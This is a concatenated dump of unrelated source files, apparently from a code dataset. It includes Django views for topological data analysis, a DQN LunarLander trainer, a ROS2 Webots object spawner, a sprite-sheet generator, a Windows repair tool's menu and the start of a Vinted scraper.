return render(request, 'analysis/mapperanalysis_detail.html', context={'analysis': my_analysis})
class AnalysisDeleteView(DeleteView):
model = Analysis
context_object_name = 'analysis'
template_name = "analysis/analysis_confirm_delete.html"
def get_object(self):
return (FiltrationAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first()
or
MapperAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first())
def get_success_url(self):
return reverse_lazy('analysis:analysis-list', kwargs={
'research_slug': self.kwargs['research_slug']
})
class AnalysisListView(ListView):
model = Analysis
context_object_name = 'analyses'
paginate_by = 10
template_name = "analysis/analysis_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['research'] = self.research
return context
def get_queryset(self):
self.research = get_object_or_404(
Research,
slug=self.kwargs['research_slug']
)
filtration_analyses = FiltrationAnalysis.objects.filter(
research=self.research
).only('name', 'creation_date', 'slug', 'research')
mapper_analyses = MapperAnalysis.objects.filter(
research=self.research
).only('name', 'creation_date', 'slug', 'research')
return sorted(chain(filtration_analyses, mapper_analyses), key=lambda x: x.creation_date, reverse=True)
@method_decorator(non_atomic_requests, name='dispatch')
class FiltrationAnalysisCreateView(CreateView):
model = FiltrationAnalysis
def get_template_names(self):
print(self.get_form_class())
if self.get_form_class() is FiltrationAnalysisCreationForm_Dataset:
return "analysis/filtrationanalysis_dataset_form.html"
elif self.get_form_class() is FiltrationAnalysisCreationForm_Precomputed:
return "analysis/filtrationanalysis_precomputed_form.html"
def get_form_class(self):
return form_dict['filtration_analysis'][self.kwargs['form']]
def get_success_url(self):
return reverse_lazy('analysis:analysis-detail', kwargs={
'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.analysis.slug
})
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['research'] = self.research
return context
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
self.research = get_object_or_404(
Research,
slug=self.kwargs['research_slug']
)
kwargs['research'] = self.research
return kwargs
def form_valid(self, form):
self.analysis = form.save(commit=False)
self.analysis.precomputed_distance_matrix_json = self.precomputed_distance_matrix_json
return super().form_valid(form)
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
files = request.FILES.getlist('precomputed_distance_matrix')
if form.is_valid():
precomputed_distance_matrixes = []
for f in sorted(files):
precomputed_distance_matrixes.append(numpy.loadtxt(f).tolist())
self.precomputed_distance_matrix_json = json.dumps(precomputed_distance_matrixes)
return self.form_valid(form)
else:
return self.form_invalid(form)
@method_decorator(non_atomic_requests, name='dispatch')
class MapperAnalysisCreateView(CreateView):
model = MapperAnalysis
def get_template_names(self):
if self.get_form_class() is MapperAnalysisCreationForm_Dataset:
return "analysis/mapperanalysis_dataset_form.html"
elif self.get_form_class() is MapperAnalysisCreationForm_Precomputed:
return "analysis/mapperanalysis_precomputed_form.html"
def get_form_class(self):
return form_dict['mapper_analysis'][self.kwargs['form']]
def get_success_url(self):
return reverse_lazy('analysis:analysis-detail', kwargs={
'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.analysis.slug
})
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['research'] = self.research
return context
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
self.research = get_object_or_404(
Research,
slug=self.kwargs['research_slug']
)
kwargs['research'] = self.research
return kwargs
def form_valid(self, form):
self.analysis = form.save(commit=False)
self.analysis.precomputed_distance_matrix_json = self.precomputed_distance_matrix_json
return super().form_valid(form)
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
files = request.FILES.getlist('precomputed_distance_matrix')
if form.is_valid():
precomputed_distance_matrixes = []
for f in files:
precomputed_distance_matrixes.append(numpy.loadtxt(f).tolist())
self.precomputed_distance_matrix_json = json.dumps(precomputed_distance_matrixes)
return self.form_valid(form)
else:
return self.form_invalid(form)
class MapperAnalysisView(View):
def get(self, request, *args, **kwargs):
my_analysis = get_object_or_404(
MapperAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_window = get_object_or_404(
MapperWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
return HttpResponse(my_window.graph)
class WindowDetailView(DetailView):
def get(self, request, *args, **kwargs):
my_analysis = (FiltrationAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first()
or
MapperAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first())
if type(my_analysis) is FiltrationAnalysis:
my_window = get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
elif type(my_analysis) is MapperAnalysis:
my_window = get_object_or_404(
MapperWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
if isinstance(my_window, FiltrationWindow):
return render(request, 'analysis/window/filtrationwindow_detail.html', context={'window': my_window,
'homology': range(my_analysis.max_homology_dimension + 1)})
elif isinstance(my_window, MapperWindow):
return render(request, 'analysis/window/mapperwindow_detail.html', context={'window': my_window})
class WindowListView(ListView):
model = Window
context_object_name = 'windows'
paginate_by = 10
template_name = "analysis/window/window_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['analysis'] = self.analysis
return context
def get_queryset(self):
self.analysis = (FiltrationAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first()
or
MapperAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first())
if type(self.analysis) is FiltrationAnalysis:
windows = FiltrationWindow.objects.filter(
analysis=self.analysis
)
elif type(self.analysis) is MapperAnalysis:
windows = MapperWindow.objects.filter(
analysis=self.analysis
)
return windows.only('name', 'creation_date', 'slug').order_by('name')
class WindowBottleneckView(View):
def get(self, request, *args, **kwargs):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_window = get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
my_window.bottleneck_calculation_onetoall(self.kwargs['homology'])
bottleneck = my_window.get_bottleneck(self.kwargs['homology'])
diagram_list = bottleneck.get_diagrams()
page = request.GET.get('page', 1)
paginator = Paginator(diagram_list, 10)
try:
diagrams = paginator.page(page)
except PageNotAnInteger:
diagrams = paginator.page(1)
except EmptyPage:
diagrams = paginator.page(paginator.num_pages)
return render(request, 'analysis/window/filtrationwindow_bottleneck.html', context={'diagrams': diagrams,
'window': my_window})
class AnalysisConsecutiveBottleneckView(View):
def get(self, request, *args, **kwargs):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_analysis.bottleneck_calculation_consecutive(self.kwargs['homology'])
bottleneck = my_analysis.get_bottleneck(Bottleneck.CONS, self.kwargs['homology'])
diagram_list = bottleneck.get_diagrams()
page = request.GET.get('page', 1)
paginator = Paginator(diagram_list, 10)
try:
diagrams = paginator.page(page)
except PageNotAnInteger:
diagrams = paginator.page(1)
except EmptyPage:
diagrams = paginator.page(paginator.num_pages)
return render(request, 'analysis/filtrationanalysis_bottleneck_consecutive.html',
context={'diagrams': diagrams,
'analysis': my_analysis
})
class AnalysisAlltoallBottleneckView(View):
def get(self, request, *args, **kwargs):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_analysis.bottleneck_calculation_alltoall(self.kwargs['homology'])
bottleneck = my_analysis.get_bottleneck(Bottleneck.ALL, self.kwargs['homology'])
diagram_list = bottleneck.get_diagrams()
page = request.GET.get('page', 1)
paginator = Paginator(diagram_list, 10)
try:
diagrams = paginator.page(page)
except PageNotAnInteger:
diagrams = paginator.page(1)
except EmptyPage:
diagrams = paginator.page(paginator.num_pages)
return render(request, 'analysis/filtrationanalysis_bottleneck_alltoall.html',
context={'diagrams': diagrams,
'analysis': my_analysis
})
class RipserDownloadView(VirtualDownloadView):
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
def get_file(self):
window_analysis = self.get_object()
return ContentFile(window_analysis.result_matrix, name=window_analysis.analysis.research.name + '_' +
window_analysis.analysis.name + '_' + str(window_analysis.name) + '.dat')
class EntropyDownloadView(VirtualDownloadView):
def get_object(self):
return get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
def get_file(self):
analysis = self.get_object()
return ContentFile(analysis.get_entropy_csv(), name=analysis.research.name + '_' +
analysis.name + '_entropy.csv')
class BottleneckONEDownloadView(VirtualDownloadView):
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_window = get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
return get_object_or_404(
Bottleneck,
window=my_window,
kind=Bottleneck.ONE,
homology=self.kwargs['homology']
)
def get_file(self):
bottleneck = self.get_object()
return ContentFile(bottleneck.get_bottleneck_matrix(),
name=bottleneck.window.analysis.research.name + '_' +
bottleneck.window.analysis.name + '_' +
str(bottleneck.window.name) + '_bottleneck_distance_one_to_all_H' + str(bottleneck.homology)
+ '.csv')
class BottleneckALLDownloadView(VirtualDownloadView):
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
Bottleneck,
analysis=my_analysis,
kind=Bottleneck.ALL,
homology=self.kwargs['homology']
)
def get_file(self):
bottleneck = self.get_object()
return ContentFile(bottleneck.get_bottleneck_matrix(), name=bottleneck.analysis.research.name + '_'
+ bottleneck.analysis.name + '_bottleneck_distance_all_to_all_H' +
str(bottleneck.homology) + '.csv')
class BottleneckCONSDownloadView(VirtualDownloadView):
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
Bottleneck,
analysis=my_analysis,
kind=Bottleneck.CONS,
homology=self.kwargs['homology']
)
def get_file(self):
bottleneck = self.get_object()
return ContentFile(bottleneck.get_bottleneck_matrix(), name=bottleneck.analysis.research.name + '_'
+ bottleneck.analysis.name + '_bottleneck_distance_consecutive_H' +
str(bottleneck.homology) + '.csv')
def AnalysisBottleneckCreateView(request, research_slug, analysis_slug):
research = get_object_or_404(Research, slug=research_slug)
analysis = get_object_or_404(FiltrationAnalysis, research=research, slug=analysis_slug)
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = AnalysisBottleneckCreationForm(analysis.max_homology_dimension, request.POST)
# check whether it's valid:
if form.is_valid():
cleaned_data = form.cleaned_data
bottleneck_type = cleaned_data.get("bottleneck_type")
homology = cleaned_data.get("homology")
if bottleneck_type == Bottleneck.CONS:
return redirect('analysis:analysis-bottleneck-consecutive', homology=homology,
analysis_slug=analysis.slug, research_slug=research.slug)
elif bottleneck_type == Bottleneck.ALL:
return redirect('analysis:analysis-bottleneck-alltoall', homology=homology,
analysis_slug=analysis.slug, research_slug=research.slug)
# if a GET (or any other method) we'll create a blank form
else:
form = AnalysisBottleneckCreationForm(analysis.max_homology_dimension)
return render(request, 'analysis/analysis_bottleneck_form.html',
{'form': form, 'research': research, 'analysis': analysis})
def WindowBottleneckCreateView(request, research_slug, analysis_slug, window_slug):
research = get_object_or_404(Research, slug=research_slug)
analysis = get_object_or_404(FiltrationAnalysis, research=research, slug=analysis_slug)
window = get_object_or_404(FiltrationWindow, analysis=analysis, slug=window_slug)
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = WindowBottleneckCreationForm(analysis.max_homology_dimension, request.POST)
# check whether it's valid:
if form.is_valid():
cleaned_data = form.cleaned_data
homology = cleaned_data.get("homology")
return redirect('analysis:window-bottleneck-onetoall', homology=homology,
window_slug=window.slug,
analysis_slug=analysis.slug, research_slug=research.slug)
# if a GET (or any other method) we'll create a blank form
else:
form = WindowBottleneckCreationForm(analysis.max_homology_dimension)
return render(request, 'analysis/window/window_bottleneck_form.html',
{'form': form, 'research': research, 'analysis': analysis, 'window': window})
class ALLBottleneckDeleteView(DeleteView):
model = Bottleneck
context_object_name = 'bottleneck'
template_name = "analysis/bottleneck_confirm_delete_ALL.html"
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
Bottleneck,
analysis=my_analysis,
homology=self.kwargs['homology'],
kind=Bottleneck.ALL
)
def get_success_url(self):
return reverse_lazy('analysis:analysis-detail', kwargs={
'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.kwargs['analysis_slug']
})
class CONSBottleneckDeleteView(DeleteView):
model = Bottleneck
context_object_name = 'bottleneck'
template_name = "analysis/bottleneck_confirm_delete_CONS.html"
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
Bottleneck,
analysis=my_analysis,
homology=self.kwargs['homology'],
kind=Bottleneck.CONS
)
def get_success_url(self):
return reverse_lazy('analysis:analysis-detail', kwargs={
'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.kwargs['analysis_slug']
})
class ONEBottleneckDeleteView(DeleteView):
model = Bottleneck
context_object_name = 'bottleneck'
template_name = "analysis/window/bottleneck_confirm_delete_ONE.html"
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_window = get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
return get_object_or_404(
Bottleneck,
window=my_window,
homology=self.kwargs['homology'],
kind=Bottleneck.ONE
)
def get_success_url(self):
return reverse_lazy('analysis:window-detail', kwargs={
'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.kwargs['analysis_slug'],
'window_slug': self.kwargs['window_slug']
})
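# Hedged illustration (added, not in the original file): the route names and
# keyword arguments used with redirect()/reverse_lazy() above imply URL
# patterns roughly like the following in analysis/urls.py; the actual paths in
# the project may differ.
#
#   app_name = "analysis"
#   urlpatterns = [
#       path("<slug:research_slug>/", AnalysisListView.as_view(), name="analysis-list"),
#       path("<slug:research_slug>/<slug:analysis_slug>/", AnalysisDetailView.as_view(), name="analysis-detail"),
#       path("<slug:research_slug>/<slug:analysis_slug>/<slug:window_slug>/", WindowDetailView.as_view(), name="window-detail"),
#   ]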
``` |
{
"source": "098799/monitour",
"score": 3
} |
#### File: 098799/monitour/monitour.py
```python
import datetime
import os
import os.path
import requests
import time
temp_refresh_rate = 1000
temp_location = "barcelona"
def addon(which):
if which in (1, 21, 31):
return "st"
elif which in (2, 22):
return "nd"
elif which in (3, 23):
return "rd"
else:
return "th"
def center(string):
padding = (terminal_width - len(string))//2
return padding * " " + string + padding * " "
def fineprint(outlist):
out = "|" + " " * 2
padding = "|" + " " * 2
for item in outlist:
out += item
out += 2* " " + "|" + 2 * " "
padding += " " * len(item)
padding += 2* " " + "|" + 2 * " "
out = out[:-2]
padding = padding[:-2]
print("\n" * ((int(terminal_height)-9)//2))
print(center(ul(out)))
print(center(padding))
print(center(out))
print(center(padding))
print(center(ul(out)))
print("\n" * ((int(terminal_height)-7)//2))
def ul(string):
return "+" +"-" * (len(string)-2) + "+"
def check_temperature():
file_name = "/tmp/outside_temperature"
if os.path.exists(file_name):
modified = os.path.getmtime(file_name)
if (time.time() - modified) < temp_refresh_rate:
with open(file_name, 'r') as infile:
temperature = infile.read()
return temperature
rr = requests.get("https://query.yahooapis.com/v1/public/yql?q=select item.condition.temp from weather.forecast where woeid in (select woeid from geo.places(1) where text%3D%22{0}%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys".format(temp_location))
temp = rr.json()['query']['results']['channel']['item']['condition']['temp']
temperature = str((int(temp)-32)*5//9)+ "°C"
with open(file_name, 'w') as outfile:
outfile.write(temperature)
return temperature
check_temperature()
today = datetime.datetime.now()
terminal_width = os.get_terminal_size().columns
terminal_height = os.get_terminal_size().lines
today_date = str(today.strftime("%A, %-d" + addon(today.day) + " of %B"))
now_time = str(today.strftime("%-H:%M"))
fineprint([today_date, now_time, check_temperature()])
``` |
{
"source": "09jvilla/CS234_gym",
"score": 3
} |
#### File: CS234_gym/vanilla_DoubleDQN/Deep_Q_Network_Solution.py
```python
import gym
import random
import torch
import numpy as np
from collections import deque
import matplotlib.pyplot as plt
import pdb
# ### 2. Instantiate the Environment and Agent
#
# Initialize the environment in the code cell below.
# In[2]:
env = gym.make('LunarLander-v2')
env.sparse_rewards=True
env.seed(0)
print('State shape: ', env.observation_space.shape)
print('Number of actions: ', env.action_space.n)
# Please refer to the instructions in `Deep_Q_Network.ipynb` if you would like to write your own DQN agent. Otherwise, run the code cell below to load the solution files.
# In[3]:
from dqn_agent import Agent
agent = Agent(state_size=8, action_size=4, seed=0, enable_curiosity=False)
# watch an untrained agent
state = env.reset()
for j in range(200):
action = agent.act(state)
env.render()
state, reward, done, _ = env.step(action)
if done:
break
env.close()
# ### 3. Train the Agent with DQN
#
# Run the code cell below to train the agent from scratch. You are welcome to amend the supplied values of the parameters in the function, to try to see if you can get better performance!
#
# Alternatively, you can skip to the next step below (**4. Watch a Smart Agent!**), to load the saved model weights from a pre-trained agent.
# In[4]:
def dqn(n_episodes=2000, max_t=1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995):
"""Deep Q-Learning.
Params
======
n_episodes (int): maximum number of training episodes
max_t (int): maximum number of timesteps per episode
eps_start (float): starting value of epsilon, for epsilon-greedy action selection
eps_end (float): minimum value of epsilon
eps_decay (float): multiplicative factor (per episode) for decreasing epsilon
"""
scores = [] # list containing scores from each episode
scores_window = deque(maxlen=100) # last 100 scores
eps = eps_start # initialize epsilon
for i_episode in range(1, n_episodes+1):
state = env.reset()
score = 0
for t in range(max_t):
action = agent.act(state, eps)
next_state, reward, done, _ = env.step(action)
agent.step(state, action, reward, next_state, done)
state = next_state
score += reward
if done:
break
scores_window.append(score) # save most recent score
scores.append(score) # save most recent score
eps = max(eps_end, eps_decay*eps) # decrease epsilon
print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="")
if i_episode % 100 == 0:
print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))
if np.mean(scores_window)>=200.0:
print('\nEnvironment solved in {:d} episodes!\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))
torch.save(agent.qnetwork_local.state_dict(), 'checkpoint.pth')
break
return scores
scores = dqn()
fig=plt.figure()
ax = fig.add_subplot(111)
l1 = [tup[0] for tup in agent.loss_list]
l2 = [tup[1] for tup in agent.loss_list]
l3 = [tup[2] for tup in agent.loss_list]
plt.plot(np.arange(len(agent.loss_list)), l1)
plt.plot(np.arange(len(agent.loss_list)), l2)
plt.plot(np.arange(len(agent.loss_list)), l3)
plt.legend(["loss1","loss2","loss3"])
plt.show()
# plot the scores
fig = plt.figure()
ax = fig.add_subplot(111)
plt.plot(np.arange(len(scores)), scores)
plt.ylabel('Score')
plt.xlabel('Episode #')
plt.show()
# ### 4. Watch a Smart Agent!
#
# In the next code cell, you will load the trained weights from file to watch a smart agent!
# In[ ]:
"""
# load the weights from file
agent.qnetwork_local.load_state_dict(torch.load('checkpoint.pth'))
for i in range(3):
state = env.reset()
for j in range(200):
action = agent.act(state)
env.render()
state, reward, done, _ = env.step(action)
if done:
break
env.close()
"""
# ### 5. Explore
#
# In this exercise, you have implemented a DQN agent and demonstrated how to use it to solve an OpenAI Gym environment. To continue your learning, you are encouraged to complete any (or all!) of the following tasks:
# - Amend the various hyperparameters and network architecture to see if you can get your agent to solve the environment faster. Once you build intuition for the hyperparameters that work well with this environment, try solving a different OpenAI Gym task with discrete actions!
# - You may like to implement some improvements such as prioritized experience replay, Double DQN, or Dueling DQN!
# - Write a blog post explaining the intuition behind the DQN algorithm and demonstrating how to use it to solve an RL environment of your choosing.
``` |
{
"source": "09labs/rocket",
"score": 2
} |
#### File: calls/auth/get_me.py
```python
import logging
from rocketchat.calls.base import RocketChatBase
logger = logging.getLogger(__name__)
class GetMe(RocketChatBase):
endpoint = '/api/v1/me'
def build_endpoint(self, **kwargs):
return self.endpoint
def post_response(self, result):
return result
``` |
{
"source": "09ubberboy90/lvl4-ros2-sim-comp",
"score": 2
} |
#### File: sim_spawner/sim_spawner/webots_spawner.py
```python
import rclpy
import os
import sys
from webots_ros2_core.webots_node import WebotsNode
from webots_ros2_core.utils import append_webots_python_lib_to_path
from webots_ros2_core.trajectory_follower import TrajectoryFollower
from sensor_msgs.msg import JointState
from ament_index_python.packages import get_package_share_directory
from geometry_msgs.msg import Pose, Point, Quaternion
from gazebo_msgs.srv import GetEntityState, GetModelList
from gazebo_msgs.msg import EntityState
import pyquaternion
try:
append_webots_python_lib_to_path()
from controller import Node
except Exception as e:
sys.stderr.write('"WEBOTS_HOME" is not correctly set.')
raise e
class SpawnerNode(WebotsNode):
def __init__(self, args=None):
super().__init__("spawner", args)
self.package_dir = get_package_share_directory('webots_simple_arm')
self.children = self.robot.getRoot().getField("children")
self.entity = self.create_service(
GetEntityState, 'get_entity_state', self.get_entity_state)
self.model = self.create_service(
GetModelList, 'get_model_list', self.get_model_list)
self.objs = {}
self.robot.simulationSetMode(self.robot.SIMULATION_MODE_FAST)
self.spawn_obj("worlds/Table.wbo", rotation = [1,0,0,1.57])
self.spawn_obj("worlds/Cube.wbo", position = [0.3-0.6, 0, 0.55])
# for x in range(-4, 5):
# for y in range(-4, 5):
# if x == 0.3 and y == 0:
# continue
# self.spawn_obj("worlds/Cube.wbo", [x/10, y/10, 0.55])
def spawn_obj(self, path, position=[0, 0, 0], offset=[0.6, 0, 0], rotation = [0,1,0,0]):
out = []
for i, j in zip(position, offset):
out.append(i+j)
self.children.importMFNode(0, os.path.join(self.package_dir, path))
obj = self.children.getMFNode(0)
obj.getField("translation").setSFVec3f(out)
obj.getField("rotation").setSFRotation(rotation)
self.objs[obj.getField("name").getSFString()] = obj
def get_model_list(self, request: GetModelList.Request, response: GetModelList.Response):
response.model_names = list(self.objs.keys())
response.success = True
return response
def get_entity_state(self, request: GetEntityState.Request, response: GetEntityState.Response):
obj = self.objs.get(request.name)
if obj is None:
response.success = False
return response
state = EntityState()
state.name = request.name
pose = Pose()
pose.position = self.get_postion(obj)
pose.orientation = self.get_rotation(obj)
state.pose = pose
response.state = state
response.success = True
return response
def get_postion(self, obj):
position = Point()
obj_pose = obj.getField("translation").getSFVec3f()
position.x = obj_pose[0]
position.y = obj_pose[1]
position.z = obj_pose[2]
return position
def get_rotation(self, obj):
rotation = Quaternion()
obj_rot = obj.getField("rotation").getSFRotation()
quat = pyquaternion.Quaternion(axis=obj_rot[:3], angle=obj_rot[3])
rotation.x = float(quat.x)
rotation.y = float(quat.y)
rotation.z = float(quat.z)
rotation.w = float(quat.w)
return rotation
def main(args=None):
rclpy.init(args=args)
os.environ['WEBOTS_ROBOT_NAME'] = "spawner"
spawner = SpawnerNode(args=args)
rclpy.spin(spawner)
rclpy.shutdown()
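# Hedged client sketch (added, not in the original file): query the
# 'get_model_list' service exposed above from a separate ROS 2 process.
def query_model_list(args=None):
    rclpy.init(args=args)
    node = rclpy.create_node("spawner_client")
    client = node.create_client(GetModelList, "get_model_list")
    if not client.wait_for_service(timeout_sec=5.0):
        node.get_logger().error("get_model_list service not available")
    else:
        future = client.call_async(GetModelList.Request())
        rclpy.spin_until_future_complete(node, future)
        node.get_logger().info("Models: %s" % list(future.result().model_names))
    node.destroy_node()
    rclpy.shutdown()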
if __name__ == '__main__':
main()
``` |
{
"source": "0a0r/PersonalTools",
"score": 3
} |
#### File: 0a0r/PersonalTools/SpriteSheetGenerator.py
```python
import cv2
import os
import numpy as np
import sys
def GetDesiredWidthAndHeight(spritesCnt):
bits = spritesCnt.bit_length()
width = 1
height = 1
if spritesCnt != (1 << (bits - 1)):
bits += 1
if bits & 1:
width = (1 << (bits >> 1))
height = width
else:
width = (1 << (bits >> 1))
height = width >> 1
return (width, height)
def GetIndexByCoords(width, height, imgWidth):
return height * imgWidth + width
def GenerateSpriteSheet(inputPath, outputPath):
spritesFilePaths = []
# Read all files path from input path
for root, dirs, files, in os.walk(inputPath):
for file in files:
if file.endswith('.png'):
spritesFilePaths.append(os.path.join(root, file))
# Empty list
spritesList = []
spritesCnt = len(spritesFilePaths)
if spritesCnt == 0:
return
for i in range(0, spritesCnt):
sprite = cv2.imread(spritesFilePaths[i], cv2.IMREAD_UNCHANGED)
spritesList.append(sprite)
(imgWidth, imgHeight, imgCol) = spritesList[0].shape
(spriteSheetWidthCnt, spriteSheetHeightCnt) = GetDesiredWidthAndHeight(spritesCnt)
    spriteSheetResult = None  # assembled sheet; set on the first row below
spriteEmptyPlaceholder = np.full((imgWidth, imgHeight, 4), (255, 255, 255, 0), np.uint8)
for h in range(0, spriteSheetHeightCnt):
spriteSheetHorizontalResult = spriteEmptyPlaceholder
for w in range(0, spriteSheetWidthCnt):
indx = GetIndexByCoords(w, h, spriteSheetWidthCnt)
spriteSheetCurrent = spriteEmptyPlaceholder
if indx < spritesCnt:
spriteSheetCurrent = spritesList[indx]
if w == 0:
spriteSheetHorizontalResult = spriteSheetCurrent
else:
spriteSheetHorizontalResult = cv2.hconcat([spriteSheetHorizontalResult, spriteSheetCurrent])
if h == 0:
spriteSheetResult = spriteSheetHorizontalResult
else:
spriteSheetResult = cv2.vconcat([spriteSheetResult, spriteSheetHorizontalResult])
filePrefix = inputPath.split('\\')[-1]
cv2.imwrite(os.path.join(outputPath, filePrefix + '_Output.png'), spriteSheetResult)
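# Example invocation (added note; folder names are placeholders):
#   python SpriteSheetGenerator.py C:\sprites\Walk C:\sprites\out
# Every .png under the input folder is packed row by row into a power-of-two
# grid and written as <InputFolderName>_Output.png in the output folder.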
if __name__ == "__main__":
GenerateSpriteSheet(sys.argv[1], sys.argv[2])
``` |
{
"source": "0AliReza0/WindowsMedicator",
"score": 3
} |
#### File: WindowsMedicator/WindowsMedicator(exe)/AdminPrivileges.py
```python
import ctypes
import platform
from colorama.ansi import Fore
""" This Class Needs Access to System For Scanning Your System's Health """
class RunProgramAsAdmin:
def IsAdmin():
        if platform.system() == "Windows":
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
class ScriptHeaders:
def ShowHeaders():
ASCII = """{0}
/////////////. ,/////////////
/////////////////// .///////////////////
/////////////////////// ///////////////////////
/////////////////////////////////////////////////
/////////////////// ////////////////////////////
////////////////// //////. ///////////////////
///////////////// ,//// ./////////////////
//////////////// /// ,///////////////.
.///////////// , / ,
,,, ,,,
,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,.
,,,,,,,,,,,,, ,,,,,,,,,,,,,,
,,,,,,,,,,, ,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,
,,,,,,,,,,
,,,,,
,,, {1} Version : 2.0.0
""".format(Fore.GREEN , Fore.WHITE)
print(f"{ASCII}\n")
print(f"{Fore.MAGENTA}[{Fore.GREEN}+{Fore.MAGENTA}] {Fore.WHITE}Windows Medicator Created By shervinbdndev\n\n\n")
print(f"\t{Fore.GREEN}[ Safe Zone ]")
print(f"{Fore.MAGENTA}[{Fore.GREEN}1{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Check System's Health")
print(f"{Fore.MAGENTA}[{Fore.GREEN}2{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Scan System's Health")
print(f"{Fore.MAGENTA}[{Fore.GREEN}3{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Restore System's Health")
print(f"{Fore.MAGENTA}[{Fore.GREEN}4{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Repair install.esd Image")
print(f"{Fore.MAGENTA}[{Fore.GREEN}5{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Repair windows Installation Image")
print(f"{Fore.MAGENTA}[{Fore.GREEN}6{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Check System's Disks")
print(f"{Fore.MAGENTA}[{Fore.GREEN}7{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Internet Connection Problem\n\n")
print(f"\t{Fore.RED}[ Danger Zone ]")
print(f"{Fore.MAGENTA}[{Fore.GREEN}8{Fore.MAGENTA}] {Fore.YELLOW}(DANGER) {Fore.WHITE}Uninstall & Delete All Windows Builtins Apps")
print(f"{Fore.MAGENTA}[{Fore.GREEN}9{Fore.MAGENTA}] {Fore.RED}(DANGER) {Fore.WHITE}Reset Factory PC\n\n")
print(f"{Fore.MAGENTA}[{Fore.GREEN}99{Fore.MAGENTA}] {Fore.WHITE}Exit")
``` |
{
"source": "0AlphaZero0/Vinted-data",
"score": 2
} |
#### File: 0AlphaZero0/Vinted-data/collect_data.py
```python
import requests
import json
import re
# api_url = "https://www.vinted.fr/api/v2/items?search_text=&catalog_ids=&color_ids=&brand_ids=&size_ids=&material_ids=&status_ids=&country_ids=&city_ids=&is_for_swap=0&page=1&per_page="
url = "https://www.vinted.fr/vetements?search_text=&brand_id[]=&color_id[]="
